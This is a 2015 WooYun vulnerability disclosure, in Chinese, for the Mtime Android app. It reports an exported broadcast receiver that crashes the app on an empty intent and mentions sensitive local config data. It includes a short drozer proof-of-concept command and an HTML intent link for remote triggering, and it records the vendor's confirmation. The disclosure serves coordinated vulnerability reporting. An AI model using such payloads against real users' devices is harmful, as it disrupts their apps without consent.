时光网Android客户端敏感信息泄露及拒绝服务漏洞（可远程利用） | wooyun-2015-0120067

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0120067

漏洞标题：

时光网Android客户端敏感信息泄露及拒绝服务漏洞（可远程利用）

漏洞详情

披露状态：

2015-06-15：细节已通知厂商并且等待厂商处理中
2015-06-15：厂商已经确认，细节仅向厂商公开
2015-06-18：细节向第三方安全合作伙伴开放
2015-08-09：细节向核心白帽子及相关领域专家公开
2015-08-19：细节向普通白帽子公开
2015-08-29：细节向实习白帽子公开
2015-09-13：细节向公众公开

简要描述：

拒绝服务及敏感信息泄露

详细说明：

时光网Android客户端broadcast组件对外暴露，恶意程序发送广播intent，组件对intent处理不当产生异常，导致应用程序进程崩溃。
本地配置文件包含敏感信息。

漏洞证明：

### 1 ### 客户端信息
官网下载的最新版本：v5.1.7
### 2 ###
AndroidManifest文件中定义的broadcast组件，对外暴露的组件存在问题，收到空的广播消息会导致app没有任何提示直接崩溃退出

<receiver android:exported="true" android:name="com.mtime.util.push.PushMessageReceiver">
            <intent-filter>
                <action android:name="com.baidu.android.pushservice.action.MESSAGE"/>
                <action android:name="com.baidu.android.pushservice.action.RECEIVE"/>
                <action android:name="com.baidu.android.pushservice.action.notification.CLICK"/>
            </intent-filter>
        </receiver>

### POC ###
（1）本地，drozer

dz> run app.broadcast.send --component com.mtime com.mtime.util.push.PushMessageReceiver

（2）远程利用，IntentScheme

<h1><a href="intent:#Intent;component=com.mtime/com.mtime.util.push.PushMessageReceiver;end">START: com.mtime.util.push.PushMessageReceiver</a></h1><br>

### 3 ### 本地配置文件敏感信息泄露

修复方案：

正确处理异常intent

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-06-15 16:17

厂商回复：

我们会尽快修正，谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云